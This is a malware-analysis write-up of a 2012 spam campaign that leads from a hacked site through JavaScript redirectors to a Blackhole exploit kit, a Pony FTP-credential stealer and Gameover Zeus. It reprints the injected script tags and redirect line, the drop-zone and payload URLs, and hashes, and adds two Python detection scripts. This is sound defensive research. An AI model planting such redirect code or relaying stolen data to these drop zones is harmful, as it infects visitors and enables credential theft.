Better Business Bureau complaint

On Wednesday February 22, 2012 Spamalysis analyzed a ‘Better Business Bureau’-themed spam campaign.

The sample acquired by Spamalysis contained a link to orjinaldengebileklikleri[.]com/7NB5g8BK/index.html. The site orjinaldengebileklikleri[.]com appears to have been hacked and used by the spammers to host a page of javascript redirectors. In this case, the page at /7NB5g8BK/index.html contains the following code:

<script type="text/javascript" src="hxxp://fortvel[.]com[.]br/X45Gmh0N/js.js"></script>
<script type="text/javascript" src="hxxp://bemestarestanplaza[.]com[.]br/sV7wfiZK/js.js"></script>
<script type="text/javascript" src="hxxp://lntecnoinfo[.]com[.]br/b6MtNdEX/js.js"></script>
<script type="text/javascript" src="hxxp://sdpatrimonial[.]com[.]br/8S6GpzBx/js.js"></script>
<script type="text/javascript" src="hxxp://sunjewel[.]com[.]ph/jwpceYRf/js.js"></script>
<script type="text/javascript" src="hxxp://www[.]jamieparker[.]org[.]au/qrMGma21/js.js"></script>

At the time of analysis every one of these javascript redirectors contained the same document.location script:

document.location='hxxp://favoriteburger[.]net/search.php?page=73a07bcb51f4be71';

This document.location script sends victims on to a Blackhole Exploit kit landing page at favoriteburger[.]net. Blackhole landing pages of this era are recognisable by the search.php?page=<16 hex characters> pattern in the URI. The kit fingerprints the victim's browser and plugins and tries a series of exploits against known vulnerabilities; if one succeeds, the kit drops a malicious payload.
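The two-stage chain described above (hacked landing page loads several js.js files, each of which sets document.location to the Blackhole landing URL) is easy to walk mechanically from cached or sandboxed copies of the pages. The following is an added example, not code from the original post: the page contents are constructed stand-ins built from the defanged snippets above, and the `fetch` callable is an assumed stand-in for a sandboxed retrieval.

```python
"""Walk the js.js redirector chain from a hacked landing page to the
exploit-kit URL it points at.  Added example; the page contents below
are constructed from the (defanged) snippets in the post."""
import re
from typing import Callable, Dict, List, Optional
from urllib.parse import urlsplit

# Constructed stand-in for /7NB5g8BK/index.html (three of the six loaders).
INDEX_HTML = """
<script type="text/javascript" src="hxxp://fortvel[.]com[.]br/X45Gmh0N/js.js"></script>
<script type="text/javascript" src="hxxp://bemestarestanplaza[.]com[.]br/sV7wfiZK/js.js"></script>
<script type="text/javascript" src="hxxp://www[.]jamieparker[.]org[.]au/qrMGma21/js.js"></script>
"""

# Every js.js in the post carried this one-liner.
JS_JS = "document.location='hxxp://favoriteburger[.]net/search.php?page=73a07bcb51f4be71';"

SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.I)
# document.location / window.location / location.href = '...' in either quote style
LOCATION_SET = re.compile(
    r"""(?:document|window)?\.?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I)
# Blackhole 1.x landing page: search.php?page=<16 hex chars>
BLACKHOLE_LANDING = re.compile(r"/search\.php\?page=[0-9a-f]{16}$", re.I)


def refang(url: str) -> str:
    """hxxp://host[.]tld -> http://host.tld so URLs can be parsed and matched."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def defang(url: str) -> str:
    """Defang only the scheme and host; path dots stay readable, as in the post."""
    p = urlsplit(url)
    out = f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}"
    return out + (f"?{p.query}" if p.query else "")


def redirector_urls(html: str) -> List[str]:
    """Stage 1: the js.js loaders referenced by the hacked landing page."""
    return [refang(u) for u in SCRIPT_SRC.findall(html)]


def redirect_target(js: str) -> Optional[str]:
    """Stage 2: the URL a loader pushes the browser to, or None if it is not a redirector."""
    m = LOCATION_SET.search(js)
    return refang(m.group(1)) if m else None


def is_blackhole_landing(url: str) -> bool:
    return bool(BLACKHOLE_LANDING.search(url))


def walk_chain(index_html: str, fetch: Callable[[str], Optional[str]]) -> Dict[str, str]:
    """Map each stage-1 loader URL to its stage-2 destination.

    `fetch` returns the JS text for a loader URL (or None); here a dict
    lookup stands in for a sandboxed retrieval.  Never fetch these from a
    workstation: the destination is a live exploit kit.
    """
    chain: Dict[str, str] = {}
    for loader in redirector_urls(index_html):
        body = fetch(loader)
        target = redirect_target(body) if body else None
        if target:
            chain[loader] = target
    return chain


if __name__ == "__main__":
    for loader, target in walk_chain(INDEX_HTML, lambda u: JS_JS).items():
        tag = "BLACKHOLE" if is_blackhole_landing(target) else "other"
        print(f"{defang(loader)} -> {defang(target)} [{tag}]")
```

The loader and destination hosts recovered this way are the indicators worth blocking; the redirector hosts are compromised third parties and will keep changing, so the landing-page pattern is the more durable detection.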

The particular kit at favoriteburger[.]net dropped a payload from favoriteburger[.]net/d.php?f=9e50a&e=4. This payload had the following properties:

File: calc.exe
Size: 94720
MD5: 60d889e7eaada6949e97bf94b3dd01ed

It's also worth noting that Conrad at Dynamo's Blog has found American Institute of CPAs-themed spam that also redirects victims through the same Blackhole exploit kit at favoriteburger[.]net/search.php?page=73a07bcb51f4be71.

Note that Wepawet also analyzed this same kit on 2012-02-21. During its analysis Wepawet retrieved a different file from the same location, favoriteburger[.]net/d.php?f=9e50a&e=1, with an MD5 of d41d8cd98f00b204e9800998ecf8427e. That hash is the MD5 of a zero-byte file, so Wepawet almost certainly received an empty response from d.php rather than a second copy of the payload: exploit kits routinely refuse to serve the binary to a client that did not arrive through a successful exploit (the e= value differs as well; in Blackhole it records which exploit triggered the download). Nothing about the payload can be concluded from that hash, and it should not be used as an indicator. Do expect the real binary's hash to change over time regardless, since the people running these kits repack or recompile their malware to defeat AV engines.

The current binary, with the hash 60d889e7eaada6949e97bf94b3dd01ed, was not detected as malicious by any AV vendor on VirusTotal when it was first submitted on 2012-02-21.

This binary is a ‘Pony’ downloader variant. It scans the victim’s computer for FTP credentials. Stolen credentials are then sent back to a drop zone at favoriteburger[.]net/pony/gate.php. Note that the same favoriteburger[.]net used to host the Blackhole Exploit kit also hosts the drop zone for the Pony downloader. This Pony variant was also configured to POST stolen credentials to the following backup drop zones should the primary drop at favoriteburger[.]net be unavailable:

hxxp://favoriteguild[.]com/pony/gate.php
hxxp://favoriteleague[.]com/pony/gate.php
hxxp://favoritelot[.]com/pony/gate.php
hxxp://favoritetank[.]net/pony/gate.php
hxxp://linertweet[.]com/pony/gate.php

If I were a betting man, I'd wager that the above domains also hosted Blackhole Exploit kits pushing out the same family of Pony downloaders.

The Pony downloader then retrieves secondary payloads from the following locations:

hxxp://www[.]diamande[.]ee/nrD19nS.exe
hxxp://crossdressinglover[.]co[.]uk/0wK76.exe
hxxp://myvidawell.h1864257[.]stratoserver[.]net/md5vRBNi.exe

These payloads are identical – each has the following properties:

Size: 291328
MD5: 19c31de2a4fba6d7379c944b9cf23f18

This payload is a Gameover Zeus banking trojan. It is currently detected by only 6 of 43 AV vendors on VirusTotal.

This Gameover Zeus variant carries the bot ID "mmx22" and also searches victim machines for data. Stolen data is sent to a drop zone at 68.173.14.233 over port 10177.
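Pulling the whole chain together (the Blackhole landing pattern, the d.php payload fetch, the Pony POST to /pony/gate.php, and the payload hashes above), here is how a practitioner would turn it into detection over proxy logs and a clean indicator set. This is an added example, not code from the original post: the proxy log lines are constructed (format assumed to be `timestamp client method url status`), and the hash sanity check exists because the Wepawet hash above is the MD5 of an empty file.

```python
"""Stage the infection chain described in the post out of proxy logs and
sanitise the hash indicators.  Added example; the log is constructed."""
import hashlib
import re
from typing import Dict, List, Optional

# Constructed proxy log (not real traffic).  URLs are the post's indicators,
# refanged so they look the way a proxy would actually log them.
PROXY_LOG = """\
2012-02-22T09:14:01Z 10.1.2.3 GET http://orjinaldengebileklikleri.com/7NB5g8BK/index.html 200
2012-02-22T09:14:02Z 10.1.2.3 GET http://fortvel.com.br/X45Gmh0N/js.js 200
2012-02-22T09:14:02Z 10.1.2.3 GET http://favoriteburger.net/search.php?page=73a07bcb51f4be71 200
2012-02-22T09:14:05Z 10.1.2.3 GET http://favoriteburger.net/d.php?f=9e50a&e=4 200
2012-02-22T09:14:09Z 10.1.2.3 POST http://favoriteburger.net/pony/gate.php 200
2012-02-22T09:14:11Z 10.1.2.3 GET http://www.diamande.ee/nrD19nS.exe 200
2012-02-22T09:15:00Z 10.1.2.7 GET http://www.example.com/search.php?page=2 200
"""

# Stage signatures, in chain order.  Blackhole 1.x: landing page is
# search.php?page=<16 hex>, payload fetch is d.php?f=<id>&e=<exploit#>.
# Pony reports stolen credentials by POST to /pony/gate.php.
STAGES = [
    ("blackhole_landing", re.compile(r"/search\.php\?page=[0-9a-f]{16}$", re.I)),
    ("blackhole_payload", re.compile(r"/d\.php\?f=[0-9a-f]+&e=\d+$", re.I)),
    ("pony_gate",         re.compile(r"/pony/gate\.php$", re.I)),
]
LOG_LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return the stage a single log line belongs to, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ts, client, method, url, _status = m.groups()
    for stage, pattern in STAGES:
        if not pattern.search(url):
            continue
        if stage == "pony_gate" and method != "POST":
            continue  # a GET of gate.php is a crawler or an analyst, not Pony
        return {"ts": ts, "client": client, "stage": stage, "url": url}
    return None


def chain_per_client(log: str) -> Dict[str, List[str]]:
    """Stages observed per client IP, in log order."""
    seen: Dict[str, List[str]] = {}
    for line in log.splitlines():
        hit = classify(line)
        if hit:
            seen.setdefault(hit["client"], []).append(hit["stage"])
    return seen


def compromised_clients(log: str) -> List[str]:
    """Clients that got past the landing page: a payload fetch or a Pony
    check-in means an exploit fired, not just that a user clicked a link."""
    return sorted(c for c, stages in chain_per_client(log).items()
                  if "blackhole_payload" in stages or "pony_gate" in stages)


# MD5 / SHA-1 / SHA-256 of zero bytes.  A "payload" with one of these hashes
# is an empty download, not a sample, and must never be shipped as an IOC.
EMPTY_HASHES = {hashlib.md5(b"").hexdigest(),
                hashlib.sha1(b"").hexdigest(),
                hashlib.sha256(b"").hexdigest()}


def usable_hash_iocs(hashes: List[str]) -> List[str]:
    """Lower-case hashes (the post mixes case), keep only well-formed ones,
    and drop the empty-file hashes."""
    out = []
    for h in hashes:
        h = h.strip().lower()
        if re.fullmatch(r"[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64}", h) and h not in EMPTY_HASHES:
            out.append(h)
    return out


if __name__ == "__main__":
    for client, stages in chain_per_client(PROXY_LOG).items():
        print(client, "->", " > ".join(stages))
    print("compromised:", compromised_clients(PROXY_LOG))
    print(usable_hash_iocs(["60d889e7eaada6949e97bf94B3dd01ed",
                            "d41d8cd98f00b204e9800998ecf8427e",
                            "19c31de2a4fba6d7379c944b9cf23f18"]))
```

The secondary .exe downloads and the Zeus drop at 68.173.14.233:10177 are deliberately not pattern-matched here: an .exe fetch is not an indicator on its own, and a fixed IP and port belong on a blocklist or in a netflow query rather than in a URL regex.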
